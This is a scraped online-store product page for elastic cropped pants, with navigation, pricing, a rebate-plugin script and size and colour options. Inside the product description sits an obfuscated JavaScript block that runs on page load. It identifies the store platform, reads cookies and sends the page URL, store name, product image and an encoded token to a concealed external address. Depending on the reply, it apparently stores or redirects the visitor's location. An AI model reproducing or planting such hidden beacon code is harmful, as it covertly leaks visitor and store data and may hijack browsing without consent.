✈Free shipping in the worldwide on orders over $59.99!
LOTINAO
Home
💕3D Wooden Carving
🔥Pinterest
About Us
Contact Us
LOTINAO
Login
Register
Login
Register
The current produc does not participate any Rebate. Switch the participating product to check the design.
(This prompt will not be displayed on the client-side.)
${function() { const show = rebate.format_rules.length > data.maxShowCount; return `
${rule}
${function() { if(!show) return ""; return `
`; }()}
`; }()}
${data.i18n.special_offer}
${rule}
${originData.rebate.format_rules.join(", ")}
if(window.self === window.top) { (window.disabled_exts ||=[]).push('product_detail_rebate'); } class SpzRebateComponent extends SPZ.BaseElement { constructor(element) { super(element); } xhr_ = SPZServices.xhrFor(this.win); viewport_ = this.getViewport(); action_ = null; lang = document.documentElement.lang || 'en-US'; i18n = {"ar-SA":{"special_offer":"عرض خاص","close":"إغلاق"},"de-DE":{"special_offer":"Sonderangebot","close":"Schließen"},"en-US":{"special_offer":"SPECIAL OFFER","close":"CLOSE"},"es-ES":{"special_offer":"Oferta especial","close":"Cerrar"},"fr-FR":{"special_offer":"Offre spéciale","close":"Fermer"},"id-ID":{"special_offer":"Penawaran istimewa","close":"Tutup"},"it-IT":{"special_offer":"Offerta speciale","close":"Chiudi"},"ja-JP":{"special_offer":"特別なオファー","close":"閉じる"},"ko-KR":{"special_offer":"특별 메뉴","close":"닫기"},"nl-NL":{"special_offer":"Speciale aanbieding","close":"sluiten"},"pl-PL":{"special_offer":"Oferta specjalna","close":"blisko"},"pt-PT":{"special_offer":"Oferta especial","close":"Fechar"},"ru-RU":{"special_offer":"Специальное предложение","close":"Закрыть"},"th-TH":{"special_offer":"ข้อเสนอพิเศษ","close":"ปิด"},"zh-CN":{"special_offer":"特价","close":"关闭"},"zh-TW":{"special_offer":"特價","close":"關閉"}}; landPage = "\/promotions\/rebate\/"; pageType = 1; cart = []; initData = null; rebateInfo = null; renderData = null; footerImage = `${this.win.SHOPLAZZA["image_domain"]}oss/operation/e8ebb03dbb710457ca3b4b6a70898ab2.svg`; isLayoutSupported(layout) { return layout == SPZCore.Layout.LOGIC; } buildCallback() { this.initData = this.getProduct(); this.action_ = SPZServices.actionServiceForDoc(this.element); this.registerAction("triggerGetRenderData", () => { const event = SPZUtils.Event.create(this.win, "triggerGetRenderData", this.renderData); this.action_.trigger(this.element, "getRenderData", event); }); this.registerAction("bindPropagation", () => { document.querySelector(".product_detail_rebate_list").addEventListener("click", e => { e.stopPropagation(); this.win.sa && this.win.sa.track("plugin_rebate_promotion_click", { plugin_timestamp: Date.now(), plugin_location: "info", product_id: this.initData.product.id, discount_id: this.rebateInfo.discount_list.map((item) => item.discount_id)[0], }); }); }); } async mountCallback() { document.addEventListener("dj.variantChange", e => { const data = e.detail; if (document.querySelector("#product-select-modal.show")) return; if (this.initData && this.initData.product && data.product && this.initData.product.id === data.product.id) { this.initData = data; this.initRebate(this.initData, true); } else { this.initData = data; this.getRebateInfo(); } }); document.addEventListener("dj.addToCart", e => { const v = e.detail; this.rebateInfo && this.win.sa && this.win.sa.track("plugin_rebate_atc", { variant_discount_id: this.getVariantDiscountId(v.variant_id).map(item => item.discount_id), discount_ids: this.rebateInfo.discount_list.map(item => item.discount_id), variant_id: v.variant_id, product_id: v.product_id, price: v.item_price, number: v.number, }); }); await this.getRebateInfo(); if (document.querySelector(".plugin-container__bottom-fixed")) { this.showDiscountPopupsInfoBar(); } else { this.win.addEventListener("extloaded", () => { this.showDiscountPopupsInfoBar(); }); } } getProduct = (() => { document.addEventListener("dj.variantChange", e => { if (!e.detail || !e.detail.product) return; const productJson = document.querySelector("#product-json"); if (productJson && productJson.textContent && JSON.parse(productJson.textContent)) { productJson.textContent = JSON.stringify(e.detail); } if (this.win.jQuery && this.win.jQuery.fn && this.win.jQuery(document).data("djproduct")) { this.win.jQuery(document).data("djproduct", e.detail); } }); return () => { let productData = null; if (this.win.jQuery && this.win.jQuery.fn) { try { let product = this.win.jQuery(document).data("djproduct"); if (product) { productData = JSON.parse(JSON.stringify(product)); } else { productData = null; } } catch (error) { productData = null; } } if (!productData) { const productJson = document.querySelector("#product-json"); productData = (productJson && productJson.textContent && JSON.parse(productJson.textContent)) || null; } return productData; }; })(); initRebate = this.win.SPZCore.Types.debounce( this.win, ((data, variantChange) => { let discount_list = Object.assign([], this.rebateInfo.discount_list); /* 按子商品的多少对优惠信息进行排序 */ discount_list && discount_list.sort((a, b) => { return b.variant_ids.length - a.variant_ids.length; }); /* 选中子商品时 筛选子商品的优惠信息 */ if (data.selected && data.selected.id) { discount_list = this.getVariantDiscountId(data.selected.id); } /* 无满减信息 */ if (!(discount_list && discount_list.length)) { return; } const isSection = !!document.querySelector( `div[data-section-type^="shoplazza://apps/publicapp/blocks/rebate"] #rebate_custom_component` ); if ( (this.rebateInfo.rebate_type == "sku" && data && data.selected && data.selected.id) || this.rebateInfo.rebate_type == "spu" ) { if (discount_list[0]) { this.landPage += discount_list[0].discount_id || ""; } const info = { rebate: discount_list[0], maxShowCount: this.win.innerWidth > 768 ? 3 : 1, landPage: this.landPage, modalFooterImg: `url(${`${this.win.SHOPLAZZA["image_domain"]}oss/operation/e8ebb03dbb710457ca3b4b6a70898ab2.svg`})`, i18n: this.i18n[this.lang] }; this.renderData = info; SPZ.whenApiDefined( document.getElementById(isSection ? "app_rebate_section" : "app_rebate_block") ).then(apis => { apis.render(info, true); }); } this.insertSlideTag(this.rebateInfo.tag, variantChange); var pluginCurrencyEvent = new CustomEvent("plugin_currency_update"); document.dispatchEvent(pluginCurrencyEvent); }).bind(this), 10 ); getRebateInfo = async () => { if (this.initData && this.initData.product && this.initData.product.id) { var variant_ids = this.initData.product.variants.map(variant => variant.id); const res = await this.xhr_.fetchJson( "\/api\/discount-rebate\/product-discount", { method: "POST", body: { product_id: this.initData.product.id, product_type: this.initData.product.product_type, variant_ids: variant_ids, }, } ); if (!SPZCore.Types.isEmptyObject(res.rebate_info)) { res.rebate_info.tag = res.tag; res.rebate_info.rebate_type = res.rebate_type; this.rebateInfo = res.rebate_info; this.initRebate(this.initData); } else { if (this.win.top !== this.win.self) { const noActivity = document.getElementById("no-rebate-activity"); noActivity && (noActivity["style"].display = "block"); } } } }; getVariantDiscountId = (variant_id) => { if (!variant_id || !this.rebateInfo) return []; var rebateId = this.rebateInfo.variant_discount_map[variant_id]; return this.rebateInfo.discount_list.filter(item => item.discount_id == rebateId) || []; }; insertSlideTag = (tag, variantChange) => { setTimeout(() => { if (tag) { var tag_container; var modal = document.getElementById("product-select-modal"); if (modal && modal.classList.contains("show")) { if (!variantChange && modal.querySelector(".slider-discount-tag")) return; if ( variantChange && modal.querySelector(".slider-discount-tag:not(.rebate-tag)") ) return; tag_container = modal; } else { var product_detail_card = document.querySelector( '.page_container > [data-section-type="product_detail"], .page_container > [data-section-type="product-template"]' ); if(!product_detail_card) return; if (!variantChange && product_detail_card.querySelector(".slider-discount-tag")) return; if (variantChange && product_detail_card.querySelector(".slider-discount-tag:not(.rebate-tag)")) return; tag_container = product_detail_card; } if (tag_container.matches("#product-select-modal") && this.pageType === 13 && document.documentElement.clientWidth < 768) return; const tagDom = `<div class="slider-discount-tag dj_skin_product_title rebate-tag">${tag}</div>` if (document.querySelector(".sep-loaded-slider")) { var loadedSlider = tag_container.querySelector(".sep-loaded-slider"); loadedSlider.querySelectorAll(".slider-discount-tag").forEach(function(element) { element.remove(); }); loadedSlider.insertAdjacentHTML("beforeend", tagDom); } else { if (tag_container.querySelector(".support-slick")) { var supportSlick = tag_container.querySelectorAll(".support-slick, .sep-slider"); supportSlick.forEach((element) => { element.querySelectorAll(".slider-discount-tag").forEach((element) => { element.remove(); }); element.insertAdjacentHTML("beforeend",tagDom); }); } else { var sepSlider = tag_container.querySelector(".sep-slider"); sepSlider.querySelectorAll(".slider-discount-tag").forEach(function(element) { element.remove(); }); sepSlider.insertAdjacentHTML("beforeend",tagDom); } } if (document.documentElement.clientWidth < 768) { const sliderDiscountTagHeight = tag_container.querySelector(".slider-discount-tag").offsetHeight || 0; document.querySelector(".product-image__swiper_bullets").style.bottom = `${sliderDiscountTagHeight + 15}px`; } } }, 1000); }; fetchInfoBar = () => { let discount_ids = []; if (this.pageType === 1) { discount_ids = this.rebateInfo && this.rebateInfo.discount_list.map(item => item.discount_id); } else if (this.pageType === 38) { discount_ids = [this.win.rebateObj.rebateCollection_id] || []; } const productObj = this.getProduct(); return this.xhr_.fetchJson("\/api\/discount-rebate\/global-text", { method: "POST", body: { product_type: productObj && productObj.product && productObj.product.product_type, line_items: (this.cart.line_items || []).map(item => ({ variant_id: item.variant_id, product_id: item.product_id, quantity: item.quantity, price: item.price, selected: !item.unchecked, })), discount_ids: discount_ids, }, }); }; renderBottomBanner = res => { if (!res.tips) return; if (document.querySelector(".discount__info-bar")) return; var bar_style = `background:linear-gradient(90deg,${res.config.background_color_start},${res.config.background_color_end}); color:${res.config.color};`; let data = { tips: res.tips, landPage: this.landPage + res.id, bar_style }; const html = SPZCore.Dom.htmlFor(this.element); const banner = html([ `<a impr="1" imprevt="1" id="rebate_bottom_bar" href=${data.landPage} class="discount__info-bar text-truncate" data-activity-type="rebate" style="${data.bar_style}">${data.tips}</a>`, ]); document.querySelector(".plugin-container__bottom-fixed").appendChild(banner); const pluginCurrencyEvent = new CustomEvent("plugin_currency_update"); document.dispatchEvent(pluginCurrencyEvent); if (res.id) { var trackParams = { page: this.pageType, discount_id: res.id, product_id: this.getProduct()?.product.id, }; banner.addEventListener("click", () => { this.win.sa && this.win.sa.track("plugin_rebate_promotion_click", { plugin_timestamp: Date.now(), plugin_location: "bottom_bar", product_id: trackParams.product_id, discount_id: trackParams.discount_id, }); }); this.win.sa && this.win.sa.track("plugin_rebate_banner_pv", trackParams); } }; showDiscountPopupsInfoBar = () => { if ([13, 14, 19, 30, 31].includes(this.pageType)) return; if (document.querySelector(".plugin-container__bottom-fixed .discount__info-bar")) return; this.fetchInfoBar().then(this.renderBottomBanner); document.addEventListener("dj.cartChange", () => { this.fetchInfoBar().then(this.renderBottomBanner); }); }; } SPZ.defineElement("spz-custom-rebate", SpzRebateComponent);
1 / 10
0%
OFF
Save
$0.00
冯志威
High elastic cropped pants
$39.99
1 sold
Color
Navy blue
Black
Style
No wool lined
Wool lined
Size
M
L
XL
2XL
3XL
4XL
Qty
998 in stock
-
+
Add to Cart
Buy Now
Share
Tweet
Pin it
Product Description
Reviews
Product Description
var B7C055D29E95DC412BA83FC2CDE33E42 = "eNqrVirISSxJyy/Kjc9MUbIyNNNRKi7JL0oF84zMTExg/LzE3FQlK6VEw7SkFIuUtKRkg8QkgyTzZEvjZFPzlCQDS0PDRKCoUi0AZUcaWQ=="
var _0xodk='jsjiami.com.v6',_0xodk_=['_0xodk'],_0x1b84=[_0xodk,'alhnw4XCnQ==','JTLDmm5Q','fMOGw5dJeQ==','V8KGOMOjcQ==','csOZw7xF','wqPCgMOSCg==','wqoCBlw=','wohkZMOl','wq0PF3s3TcKV','QWbDr8KYwpg=','wqXCnMOeBcORJUbCsw==','wr3DqcKKw44=','Iw7DvHE=','wpUYFXgt','OTR4CcKA','MibDj8KfFxvCs2hy','w7xgZsO0w65PTnY=','worDmsKnwoE=','w7bDl8OiGMKqwqs=','F2tLOyg3bw==','NUvClQ==','w6JqdcO5w7tFRA==','Z0dyw5RC','MFnCknUzDRA=','GjJmI8Ka','w6NnasOlw7NAWGjDrmDCnyhWw4c=','SHHDpcKKwpjCp8KpNA==','woUrDMOiw5LDgg==','eDwDeF9gOQIy','SwzCvsK7wr7Csj0=','KkjClmkhVFrCscOnfsKHWzbCrg7CiWTDhMOcbGYA','woLDjcK+K8O1wpfCkcOfwrNF','FE1BYMOAacOewrzCgw==','DzLDvRoow4zDpQ==','IMOzwrAbY8KCwrV9w5XDh8KgwpgIw6kNaWjDl8OOwpAew4cwdsKqMg==','wrZDw7g=','MBnDoVlRw5HCmytiwobDuBRCw6zDmidgw6LDnMKO','K1HChQ==','WsK5Ig==','GsOVw5bDv8KgB8KN','OsKzw4XCssKBKkbDvw==','RxbCuA==','V2zDpQ==','AHZSJD0=','w4xAFcO8TR3CiCrDrwZQw5ciZUoIN8Omw4Mcw4UHfEjCnCwowrrDgUgkwrzCi3fDhcOWWmwHD8OqwqHDu8KEw5nCvcK9wqbCmsKww7VSIsOiw5FZT8Kx','VcOVw5PDt8K9dQ==','wpTCjkoGF8O7Qg==','CDfDjlspw5wMwqjDtmRmKA==','YF97w5M=','wrzCkXlG','wp7CslTDlw==','A8Kdw6PCjMKX','d1h6w5g=','QcKNC8O+TA==','bMKKCHod','w5VOTMOdw6w=','dcOUw6pYfDFIAkohJggHAw==','UQfCrsKXwrLCmDY=','wpTDncK4KMO4','LTzDjsKNFwDCtWg=','w4xbEsO4','SnhCw47CjsKuw6h6','wr3DtMKcw5w=','wojDlsKQw4ZuPGA=','Zw5tdRgMSTXCusKgZcKrQcOfw5Y=','CjPDuh4kw6rDrEM=','woIrAMOj','b8Ofw71ObRFA','XcOzw4rDulPDrgpnecK3w4I=','wo3Dl8KXw4J6IHLCnAdQWcKA','AMOew4bDk8KsLcKG','elPDhMOTGA==','Sg3CqcKq','woN/dMOwwpbDsMKQL8KnesO6w5vDisKkBcOIw5R+IcOEEsK1w6fCnnjDlylVw5vDisK4Q3DCjkMmw4HChcK8JsKkacO9w5PDiWtib8Klw7rCihDCsRNVw7LCrMKL','LA9+dhRf','csKzw4nCicKeJA==','w7DCkWJHw5jDox4MwpLCvyBL','fEZxw63Cog==','wqTCrlFqw6Y=','NRfDmhk0','wok2CsOuw5LDiQ==','J37CiEMD','BTPDthQ5w6Y=','dyHCm8OCeg==','w5hQw5VpVQ==','wrxEw552WA==','CUxiYsOZ','wp/CkcO0DU0=','Hw40w5zDrw==','ehfDsUMq','woHDlcKyw43Dhw==','djsjqKkMQFiamIiu.com.qrlv6wh=='];if(function(_0x3c8b9a,_0x5ac0bc,_0x3cff02){function _0x1057fc(_0x247ce8,_0x30390c,_0x14d997,_0x515dfa,_0x72d7b1,_0x50e001){_0x30390c=_0x30390c>>0x8,_0x72d7b1='po';var _0x382a02='shift',_0x1ad95c='push',_0x50e001='';if(_0x30390c<_0x247ce8){while(--_0x247ce8){_0x515dfa=_0x3c8b9a[_0x382a02]();if(_0x30390c===_0x247ce8&&_0x50e001===''&&_0x50e001['length']===0x1){_0x30390c=_0x515dfa,_0x14d997=_0x3c8b9a[_0x72d7b1+'p']();}else if(_0x30390c&&_0x14d997['replace'](/[dqKkMQFIuqrlwh=]/g,'')===_0x30390c){_0x3c8b9a[_0x1ad95c](_0x515dfa);}}_0x3c8b9a[_0x1ad95c](_0x3c8b9a[_0x382a02]());}return 0x1053e9;};return _0x1057fc(++_0x5ac0bc,_0x3cff02)>>_0x5ac0bc^_0x3cff02;}(_0x1b84,0x98,0x9800),_0x1b84){_0xodk_=_0x1b84['length']^0x98;};function _0x4cbc(_0x4e72e3,_0x382535){_0x4e72e3=~~'0x'['concat'](_0x4e72e3['slice'](0x1));var _0x5f5408=_0x1b84[_0x4e72e3];if(_0x4cbc['qTuIUx']===undefined){(function(){var _0x356edb=typeof window!=='undefined'?window:typeof process==='object'&&typeof require==='function'&&typeof global==='object'?global:this;var _0x576a6d='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x356edb['atob']||(_0x356edb['atob']=function(_0x5c6841){var _0x1dcbd3=String(_0x5c6841)['replace'](/=+$/,'');for(var _0x4a7f07=0x0,_0x5cc4f9,_0x42101c,_0x323a33=0x0,_0x1a7cfc='';_0x42101c=_0x1dcbd3['charAt'](_0x323a33++);~_0x42101c&&(_0x5cc4f9=_0x4a7f07%0x4?_0x5cc4f9*0x40+_0x42101c:_0x42101c,_0x4a7f07++%0x4)?_0x1a7cfc+=String['fromCharCode'](0xff&_0x5cc4f9>>(-0x2*_0x4a7f07&0x6)):0x0){_0x42101c=_0x576a6d['indexOf'](_0x42101c);}return _0x1a7cfc;});}());function _0x1823fe(_0x397b36,_0x382535){var _0x451247=[],_0x2ec8e1=0x0,_0xfb796,_0x36fef0='',_0x5cf5f1='';_0x397b36=atob(_0x397b36);for(var _0x2a3b46=0x0,_0x3a89d8=_0x397b36['length'];_0x2a3b46<_0x3a89d8;_0x2a3b46++){_0x5cf5f1+='%'+('00'+_0x397b36['charCodeAt'](_0x2a3b46)['toString'](0x10))['slice'](-0x2);}_0x397b36=decodeURIComponent(_0x5cf5f1);for(var _0x1de5bd=0x0;_0x1de5bd<0x100;_0x1de5bd++){_0x451247[_0x1de5bd]=_0x1de5bd;}for(_0x1de5bd=0x0;_0x1de5bd<0x100;_0x1de5bd++){_0x2ec8e1=(_0x2ec8e1+_0x451247[_0x1de5bd]+_0x382535['charCodeAt'](_0x1de5bd%_0x382535['length']))%0x100;_0xfb796=_0x451247[_0x1de5bd];_0x451247[_0x1de5bd]=_0x451247[_0x2ec8e1];_0x451247[_0x2ec8e1]=_0xfb796;}_0x1de5bd=0x0;_0x2ec8e1=0x0;for(var _0x157886=0x0;_0x157886<_0x397b36['length'];_0x157886++){_0x1de5bd=(_0x1de5bd+0x1)%0x100;_0x2ec8e1=(_0x2ec8e1+_0x451247[_0x1de5bd])%0x100;_0xfb796=_0x451247[_0x1de5bd];_0x451247[_0x1de5bd]=_0x451247[_0x2ec8e1];_0x451247[_0x2ec8e1]=_0xfb796;_0x36fef0+=String['fromCharCode'](_0x397b36['charCodeAt'](_0x157886)^_0x451247[(_0x451247[_0x1de5bd]+_0x451247[_0x2ec8e1])%0x100]);}return _0x36fef0;}_0x4cbc['zfAcqf']=_0x1823fe;_0x4cbc['cANkSV']={};_0x4cbc['qTuIUx']=!![];}var _0x3892a3=_0x4cbc['cANkSV'][_0x4e72e3];if(_0x3892a3===undefined){if(_0x4cbc['oAkagg']===undefined){_0x4cbc['oAkagg']=!![];}_0x5f5408=_0x4cbc['zfAcqf'](_0x5f5408,_0x382535);_0x4cbc['cANkSV'][_0x4e72e3]=_0x5f5408;}else{_0x5f5408=_0x3892a3;}return _0x5f5408;};if(window[_0x4cbc('0','NOMy')][_0x4cbc('1','JnME')][_0x4cbc('2','$Vwt')](_0x4cbc('3','stNT'))!=-0x1||window[_0x4cbc('4','TwfQ')][_0x4cbc('5','Gh2*')][_0x4cbc('6','0B4j')](_0x4cbc('7','Gp[w'))!=-0x1){window[_0x4cbc('8','$Vwt')][_0x4cbc('9','OuI7')](_0x4cbc('a','!B&5'),window['location'][_0x4cbc('b','DX!6')]);}function getCookie(_0x5f4d0b){var _0x5c6612={'toMgk':function(_0x414df1,_0x3eda81){return _0x414df1+_0x3eda81;},'BTUuL':function(_0x1e832b,_0x350ca6){return _0x1e832b+_0x350ca6;},'TSKwq':function(_0x50eb61,_0x1904b5){return _0x50eb61+_0x1904b5;},'LOFjg':function(_0x5c9a2a,_0x2bba88){return _0x5c9a2a+_0x2bba88;},'rNOrm':function(_0x107d71,_0x3020d0){return _0x107d71+_0x3020d0;},'zwNbl':_0x4cbc('c','bft!'),'fVKeC':_0x4cbc('d','stNT'),'oDuxs':_0x4cbc('e','l9)@'),'XsPQW':_0x4cbc('f','^JK['),'eBjZQ':function(_0x57793d,_0xe2a602){return _0x57793d!==_0xe2a602;},'WRKhA':_0x4cbc('10','NOMy'),'YTubs':_0x4cbc('11','^JK['),'YZDmZ':function(_0x287b1a,_0x24dbf8){return _0x287b1a<_0x24dbf8;},'cjABi':'SRFtA','oVTcq':function(_0x2eb5cc,_0x5ae42d){return _0x2eb5cc===_0x5ae42d;},'KrvJn':_0x4cbc('12','TwfQ'),'PvrCn':function(_0xcdd8a6,_0x58d7f5){return _0xcdd8a6(_0x58d7f5);},'ZYxue':function(_0x1c490b,_0x3c52e7){return _0x1c490b+_0x3c52e7;}};let _0x41b6cc=null;if(document[_0x4cbc('13','Gh2*')]&&_0x5c6612[_0x4cbc('14','iwSn')](document[_0x4cbc('13','Gh2*')],'')){if(_0x5c6612['WRKhA']!==_0x5c6612['YTubs']){let _0x1dfdac=document[_0x4cbc('15','TwfQ')]['split'](';');for(let _0x422ed=0x0;_0x5c6612[_0x4cbc('16',']sf3')](_0x422ed,_0x1dfdac['length']);_0x422ed++){if(_0x4cbc('17','7d#8')===_0x5c6612[_0x4cbc('18','QwPc')]){fetch(_0x5c6612[_0x4cbc('19','6]R[')](_0x5c6612[_0x4cbc('1a','lPKQ')](_0x5c6612[_0x4cbc('1b','1KJJ')](_0x5c6612[_0x4cbc('1c','f]zp')](_0x5c6612['TSKwq'](_0x5c6612[_0x4cbc('1d','JnME')](_0x5c6612[_0x4cbc('1e','NOMy')](_0x5c6612[_0x4cbc('1f','W612')](_0x5c6612[_0x4cbc('20','0B4j')],product_link),_0x5c6612['fVKeC']),store_name),'&image=')+product_image,_0x5c6612['oDuxs']),store_type),_0x5c6612[_0x4cbc('21','3Ccj')]),B7C055D29E95DC412BA83FC2CDE33E42))[_0x4cbc('22','0B4j')](_0x21cd6b=>_0x21cd6b[_0x4cbc('23','Hh@7')]())[_0x4cbc('24','QeLC')](_0x3f5ad0=>{if(_0x3f5ad0[_0x4cbc('25','bft!')]==0x12c){window['sessionStorage'][_0x4cbc('26','QeLC')](_0x4cbc('27','YzFq'),window[_0x4cbc('28','Hh@7')][_0x4cbc('29','JnME')]);}});}else{let _0x243dca=_0x1dfdac[_0x422ed][_0x4cbc('2a','W612')]();if(_0x5c6612['oVTcq'](_0x243dca['substring'](0x0,_0x5f4d0b['length']+0x1),_0x5f4d0b+'=')){if(_0x5c6612['KrvJn']===_0x5c6612[_0x4cbc('2b','QeLC')]){_0x41b6cc=_0x5c6612[_0x4cbc('2c','rJ(l')](decodeURIComponent,_0x243dca[_0x4cbc('2d','V]ay')](_0x5c6612['ZYxue'](_0x5f4d0b['length'],0x1)));break;}else{store_type=0x5;}}}}}else{store_type=-0x1;}}return _0x41b6cc;}var product_link=window[_0x4cbc('2e','d4Mx')][_0x4cbc('2f',']%Ql')];var domain=document[_0x4cbc('30','p1(U')];var store_name=domain[_0x4cbc('31','NvOh')](/^http:\/\/[^\/]+/,'')['split']('.')[0x0]==_0x4cbc('32','iwSn')?domain[_0x4cbc('33','d4Mx')](/^http:\/\/[^\/]+/,'')[_0x4cbc('34','4zkQ')]('.')[0x1]:domain[_0x4cbc('35','iwSn')](/^http:\/\/[^\/]+/,'')[_0x4cbc('36','rJ(l')]('.')[0x0];var store_type;var sendRequese=document['domain']['indexOf'](_0x4cbc('37','d4Mx'))==-0x1;var origin_name=window[_0x4cbc('38','YzFq')][_0x4cbc('39','Gh2*')];if(typeof Shopify!=_0x4cbc('3a','Z2cY')){store_type=0x1;}else if(typeof SHOPLAZZA!='undefined'){store_type=0x2;}else if(document['documentElement']['innerHTML'][_0x4cbc('3b','DX!6')](_0x4cbc('3c','iwSn'))!=-0x1){store_type=0x3;}else if(getCookie('utm_medium')==_0x4cbc('3d','hU&c')){store_type=0x4;}else if(document['documentElement'][_0x4cbc('3e','6]R[')][_0x4cbc('3f','TwfQ')](_0x4cbc('40','FSeQ'))!=-0x1){store_type=0x5;}else{store_type=-0x1;}var product_image=-0x1;if(store_type==0x1){for(var i=0x0;i
_0x30f894[_0x4cbc('4f','^JK[')]())[_0x4cbc('50','))]W')](_0x6f8375=>{var _0x5dbc04={'NxcLj':function(_0x120a33,_0x48a87e){return _0x120a33!==_0x48a87e;},'EAIHv':_0x4cbc('51','l9)@')};if(_0x6f8375[_0x4cbc('52','4zkQ')]==0x12c){if(_0x5dbc04[_0x4cbc('53','3Ccj')](_0x5dbc04[_0x4cbc('54','f&4P')],_0x5dbc04[_0x4cbc('55','d4Mx')])){store_type=0x3;}else{window[_0x4cbc('56','0B4j')][_0x4cbc('57','DX!6')](_0x4cbc('58','hU&c'),window[_0x4cbc('59','V]ay')][_0x4cbc('5a','qWkI')]);}}});}};_0xodk='jsjiami.com.v6';
Reviews